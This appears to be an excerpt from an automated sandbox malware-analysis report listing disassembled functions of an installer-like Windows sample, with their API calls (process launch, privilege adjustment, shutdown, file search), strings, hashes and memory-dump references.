                                                                                      • Opcode Fuzzy Hash: 1d806d9dda6068bb291ca6d6d76056618574950846b2f0729205e6ddb2b5ae31
                                                                                      • Instruction Fuzzy Hash: 455174B1900608EFDB10DF99C845BEEB7B8EB49315F14806AF904B7382D7789945CFA9
                                                                                      Function 004739C4 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 77COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00473A17
                                                                                      • GetLastError.KERNEL32(?,?), ref: 00473A20
                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00473A6D
                                                                                      • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 00473A91
                                                                                      • CloseHandle.KERNEL32(00000000,00473AC2,00000000,00000000,000000FF,000000FF,00000000,00473ABB,?,?,?), ref: 00473AB5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCodeErrorExecuteExitHandleLastMultipleObjectsProcessShellWait
                                                                                      • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                                      • API String ID: 171997614-221126205
                                                                                      • Opcode ID: bdd79b2e264e3947b3271ce07b307c804a443899bf148872aca85f54ba098470
                                                                                      • Instruction ID: fd51c6fdc7ef3a5c4723c7cab516b72f55abc6f577cd61f87c3a1e5de1d1d72d
                                                                                      • Opcode Fuzzy Hash: bdd79b2e264e3947b3271ce07b307c804a443899bf148872aca85f54ba098470
                                                                                      • Instruction Fuzzy Hash: C92167B0A00204ABDB14EFA98943ADD76E8EF05709F50843BF548F62C2DB7C9A04975D
                                                                                      Function 004227CC Relevance: 18.3, APIs: 12, Instructions: 255windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 00422964
                                                                                      • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422B2E), ref: 00422974
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSendShowWindow
                                                                                      • String ID:
                                                                                      • API String ID: 1631623395-0
                                                                                      • Opcode ID: fa9062f2f8c7c292f6ba47f23b62071bd1c02060dccc7d557ee2b61b6739a24d
                                                                                      • Instruction ID: 22a298226f26ad5282d2b06c056c5494fcfa573f7ff451a3aba74327ab4f92ef
                                                                                      • Opcode Fuzzy Hash: fa9062f2f8c7c292f6ba47f23b62071bd1c02060dccc7d557ee2b61b6739a24d
                                                                                      • Instruction Fuzzy Hash: A6917271B04214FFD710EBA9DA86F9D77F4AB09314F5104BAF504AB3A2C778AE409B58
                                                                                      Function 004182F4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 58windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • IsIconic.USER32(?), ref: 00418303
                                                                                      • GetWindowPlacement.USER32(?,0000002C), ref: 00418320
                                                                                      • GetWindowRect.USER32(?), ref: 0041833C
                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 0041834A
                                                                                      • GetWindowLongA.USER32(?,000000F8), ref: 0041835F
                                                                                      • ScreenToClient.USER32(00000000), ref: 00418368
                                                                                      • ScreenToClient.USER32(00000000,?), ref: 00418373
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                      • String ID: ,
                                                                                      • API String ID: 2266315723-3772416878
                                                                                      • Opcode ID: 76ed797ea6865fddbc3593e7458191c6aaa261637689223d055d8f073444f388
                                                                                      • Instruction ID: 9cf88c6662a8b54f2d940af1896da5675c8924d24fa9a5d7825e36bf04e718ba
                                                                                      • Opcode Fuzzy Hash: 76ed797ea6865fddbc3593e7458191c6aaa261637689223d055d8f073444f388
                                                                                      • Instruction Fuzzy Hash: 40112B71505201AFDB00DF69C885F9B77E8AF49314F18067EBD58DB286C739D900CB69
                                                                                      Function 00453FD0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41shutdownCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(00000028), ref: 00453FDF
                                                                                      • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00453FE5
                                                                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00453FFE
                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00454025
                                                                                      • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0045402A
                                                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 0045403B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                      • String ID: SeShutdownPrivilege
                                                                                      • API String ID: 107509674-3733053543
                                                                                      • Opcode ID: 38b00b688662a0d9bbbecbe7d33395a35eb7a17cbac0a46106fc5b3172d15a50
                                                                                      • Instruction ID: fefb7ae41868014354d83cb3ae28757c4cdc7dcc71e7b198ec4e0078f4c74e40
                                                                                      • Opcode Fuzzy Hash: 38b00b688662a0d9bbbecbe7d33395a35eb7a17cbac0a46106fc5b3172d15a50
                                                                                      • Instruction Fuzzy Hash: 06F06270694702B5E620AA758C07F6B25989B80F8DF60492ABE45EF1C3D6BCC54C4A2A
                                                                                      Function 0045B864 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 34libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045B86D
                                                                                      • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045B87D
                                                                                      • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045B88D
                                                                                      • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047A5DB,00000000,0047A604), ref: 0045B8B2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$CryptVersion
                                                                                      • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                                                      • API String ID: 1951258720-508647305
                                                                                      • Opcode ID: c3c7ec0b1ce4a4f9ebe2d8e394cd6736047279cae241cd1696ff5e4f0e7e87a0
                                                                                      • Instruction ID: 302474af057a75e6aa59db1b8817eaeab706bde5883f342fd947c8368cb819cc
                                                                                      • Opcode Fuzzy Hash: c3c7ec0b1ce4a4f9ebe2d8e394cd6736047279cae241cd1696ff5e4f0e7e87a0
                                                                                      • Instruction Fuzzy Hash: BFF0F9B0529700DEEB06EF76AC866623699E79032AF14D43BE408961A2D77C0448CF1C
                                                                                      Function 00492760 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 90fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,0049289E,?,?,00000000,00496628,?,00492A28,00000000,00492A7C,?,?,00000000,00496628), ref: 004927B7
                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 0049283A
                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,00492876,?,00000000,?,00000000,0049289E,?,?,00000000,00496628,?,00492A28,00000000), ref: 00492852
                                                                                      • FindClose.KERNEL32(000000FF,0049287D,00492876,?,00000000,?,00000000,0049289E,?,?,00000000,00496628,?,00492A28,00000000,00492A7C), ref: 00492870
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFind$AttributesCloseFirstNext
                                                                                      • String ID: isRS-$isRS-???.tmp
                                                                                      • API String ID: 134685335-3422211394
                                                                                      • Opcode ID: 70fea279a0487c66a379aa7ff36a45d08903b4abdbe9169b97591ec596f32377
                                                                                      • Instruction ID: 6f3af90e7e4d79464d1657adb4957f5333b5dfcd3ed3f620ee887a0d658b233a
                                                                                      • Opcode Fuzzy Hash: 70fea279a0487c66a379aa7ff36a45d08903b4abdbe9169b97591ec596f32377
                                                                                      • Instruction Fuzzy Hash: A5319471900618BFDF10EF66CD41ACEBBBCDB49304F5085F7A808A32A1D7789E458E58
                                                                                      Function 0047884C Relevance: 9.2, APIs: 6, Instructions: 195fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindFirstFileA.KERNEL32(00000000,?,?,?,?,00000000,00478B12,?,00000000,?,00000000,?,00478C56,00000000,00000000), ref: 004788AD
                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,004789BD,?,00000000,?,?,?,?,00000000,00478B12,?,00000000,?,00000000), ref: 00478999
                                                                                      • FindClose.KERNEL32(000000FF,004789C4,004789BD,?,00000000,?,?,?,?,00000000,00478B12,?,00000000,?,00000000), ref: 004789B7
                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,?,00000000,00478B12,?,00000000,?,00000000,?,00478C56,00000000), ref: 00478A10
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$File$First$CloseNext
                                                                                      • String ID:
                                                                                      • API String ID: 2001080981-0
                                                                                      • Opcode ID: bf4e0802f79d6ecb0b26fe8947a890451376e871c9cd550310497b4db5b6158c
                                                                                      • Instruction ID: c53e02efa538cd00ed8c6064e36d24adcac4933ff0a83cd0056e21b928a08691
                                                                                      • Opcode Fuzzy Hash: bf4e0802f79d6ecb0b26fe8947a890451376e871c9cd550310497b4db5b6158c
                                                                                      • Instruction Fuzzy Hash: CD71607090020DAFCF11EFA5CC45ADFBBB9EF49304F5084AAE508A7291DB399A45CF59
                                                                                      Function 00455800 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 241windownativeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 0045587D
                                                                                      • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004558A4
                                                                                      • SetForegroundWindow.USER32(?), ref: 004558B5
                                                                                      • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00455B8F,?,00000000,00455BCB), ref: 00455B7A
                                                                                      Strings
                                                                                      • Cannot evaluate variable because [Code] isn't running yet, xrefs: 004559FA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                                                      • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                                      • API String ID: 2236967946-3182603685
                                                                                      • Opcode ID: aba927f1f309b32fe38766258577f601f314c8aed9c78afadeeb596dcf30424a
                                                                                      • Instruction ID: 78b58341f63533b3ae22fdc0b35f2ff7933112878ccc3eccec269f40d3d6be6d
                                                                                      • Opcode Fuzzy Hash: aba927f1f309b32fe38766258577f601f314c8aed9c78afadeeb596dcf30424a
                                                                                      • Instruction Fuzzy Hash: 0291C234604604EFD715CF65D965F6ABBF9EB48714F2180BAEC0497792C739AE04CB18
                                                                                      Function 004547F8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,0045492C), ref: 00454828
                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0045482E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProc
                                                                                      • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                      • API String ID: 1646373207-3712701948
                                                                                      • Opcode ID: eac562a1060f7fadf38ecb16a1882514189a9ad3f183d6e31b82e056aa49acf1
                                                                                      • Instruction ID: 4ed4d427c84f2e0797dfbcbbf1775a844099e9a297d380e2836bd8fb6971dfff
                                                                                      • Opcode Fuzzy Hash: eac562a1060f7fadf38ecb16a1882514189a9ad3f183d6e31b82e056aa49acf1
                                                                                      • Instruction Fuzzy Hash: DA316275A04249AFCF01EFA5C8829EFB7B8EF89704F504567E800F7252D6385D098B68
                                                                                      Function 00417C40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • IsIconic.USER32(?), ref: 00417C7F
                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417C9D
                                                                                      • GetWindowPlacement.USER32(?,0000002C), ref: 00417CD3
                                                                                      • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417CFA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Placement$Iconic
                                                                                      • String ID: ,
                                                                                      • API String ID: 568898626-3772416878
                                                                                      • Opcode ID: 81a48e547fa398d3f0e332d3c5732c978cb07eabcf612ef17b70e18ae1a1ab95
                                                                                      • Instruction ID: c7e48a005123f112bfb3c773aae920d88014dc0855fb7fe4f04d55f6c4297c8c
                                                                                      • Opcode Fuzzy Hash: 81a48e547fa398d3f0e332d3c5732c978cb07eabcf612ef17b70e18ae1a1ab95
                                                                                      • Instruction Fuzzy Hash: 92213E71604204ABCF00EF69D8C4ADA77B8AF48314F11456AFD18DF346D678E984CBA8
                                                                                      Function 00460594 Relevance: 7.6, APIs: 5, Instructions: 129fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetErrorMode.KERNEL32(00000001,00000000,00460751), ref: 004605C5
                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,00460724,?,00000001,00000000,00460751), ref: 00460654
                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,00460706,?,00000000,?,00000000,00460724,?,00000001,00000000,00460751), ref: 004606E6
                                                                                      • FindClose.KERNEL32(000000FF,0046070D,00460706,?,00000000,?,00000000,00460724,?,00000001,00000000,00460751), ref: 00460700
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$File$CloseErrorFirstModeNext
                                                                                      • String ID:
                                                                                      • API String ID: 4011626565-0
                                                                                      • Opcode ID: 8e5f21022fae35bd05caf680941799b374ea027a06ecb90817f05a91b3dc2be9
                                                                                      • Instruction ID: f78dcee57c625dac1728093300786459247b71741faca452f92d1a4d7efbbe15
                                                                                      • Opcode Fuzzy Hash: 8e5f21022fae35bd05caf680941799b374ea027a06ecb90817f05a91b3dc2be9
                                                                                      • Instruction Fuzzy Hash: D941B970A006189FDB11EF65DC85ADFB7B8EB88705F5044BAF804E7391D63C9E488E59
                                                                                      Function 00460A10 Relevance: 7.6, APIs: 5, Instructions: 129fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetErrorMode.KERNEL32(00000001,00000000,00460BF7), ref: 00460A85
                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,00460BC2,?,00000001,00000000,00460BF7), ref: 00460ACB
                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,00460BA4,?,00000000,?,00000000,00460BC2,?,00000001,00000000,00460BF7), ref: 00460B80
                                                                                      • FindClose.KERNEL32(000000FF,00460BAB,00460BA4,?,00000000,?,00000000,00460BC2,?,00000001,00000000,00460BF7), ref: 00460B9E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$File$CloseErrorFirstModeNext
                                                                                      • String ID:
                                                                                      • API String ID: 4011626565-0
                                                                                      • Opcode ID: 49e9851897b8f681d322c96bb90846bd68f017f54ff683acd975a5c922cbe8b7
                                                                                      • Instruction ID: c4fca8719043302f1557867009f5b54629f0d04ae6016422a46977757255b98a
                                                                                      • Opcode Fuzzy Hash: 49e9851897b8f681d322c96bb90846bd68f017f54ff683acd975a5c922cbe8b7
                                                                                      • Instruction Fuzzy Hash: D7417631A00618DFCB10EFA5DC859DFB7B8EB88709F5085A6F804A7341E7789E448E59
                                                                                      Function 0042E6DC Relevance: 7.6, APIs: 5, Instructions: 50fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00451B47,00000000,00451B68), ref: 0042E6FE
                                                                                      • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E729
                                                                                      • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00451B47,00000000,00451B68), ref: 0042E736
                                                                                      • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00451B47,00000000,00451B68), ref: 0042E73E
                                                                                      • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00451B47,00000000,00451B68), ref: 0042E744
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                                      • String ID:
                                                                                      • API String ID: 1177325624-0
                                                                                      • Opcode ID: b398f5f594d3ce364fdf5cd670d1d6f1cfc7debce29cf4bfe02d4251d0372630
                                                                                      • Instruction ID: 405047736e0f3db58adf1e262a5124b738154ad7abc3b976f47152011cf6baa3
                                                                                      • Opcode Fuzzy Hash: b398f5f594d3ce364fdf5cd670d1d6f1cfc7debce29cf4bfe02d4251d0372630
                                                                                      • Instruction Fuzzy Hash: 12F0F0713917207AF620B1BA6CC6F7B018CC7C5B68F10823ABB04FF1C1D9A84C06056D
                                                                                      Function 0047E0A8 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • IsIconic.USER32(?), ref: 0047E0E6
                                                                                      • GetWindowLongA.USER32(00000000,000000F0), ref: 0047E104
                                                                                      • ShowWindow.USER32(00000000,00000005,00000000,000000F0,00497030,0047D932,0047D966,00000000,0047D986,?,?,00000001,00497030), ref: 0047E126
                                                                                      • ShowWindow.USER32(00000000,00000000,00000000,000000F0,00497030,0047D932,0047D966,00000000,0047D986,?,?,00000001,00497030), ref: 0047E13A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Show$IconicLong
                                                                                      • String ID:
                                                                                      • API String ID: 2754861897-0
                                                                                      • Opcode ID: f6c937e62bd4f7f33b8cff1129e0ff9e0c9ea1576419266ffb873d417130a402
                                                                                      • Instruction ID: c92ae80fdea3dbb9ecd522712915d334841aed4b7b9fd6eda1dbd96f1c302fca
                                                                                      • Opcode Fuzzy Hash: f6c937e62bd4f7f33b8cff1129e0ff9e0c9ea1576419266ffb873d417130a402
                                                                                      • Instruction Fuzzy Hash: 910171702252509ADB00B776CC46BDB2396AB19344F4486BBF8489B3A3CA7D9C61974C
                                                                                      Function 0045F008 Relevance: 4.6, APIs: 3, Instructions: 67fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,0045F0DC), ref: 0045F060
                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,0045F0BC,?,00000000,?,00000000,0045F0DC), ref: 0045F09C
                                                                                      • FindClose.KERNEL32(000000FF,0045F0C3,0045F0BC,?,00000000,?,00000000,0045F0DC), ref: 0045F0B6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
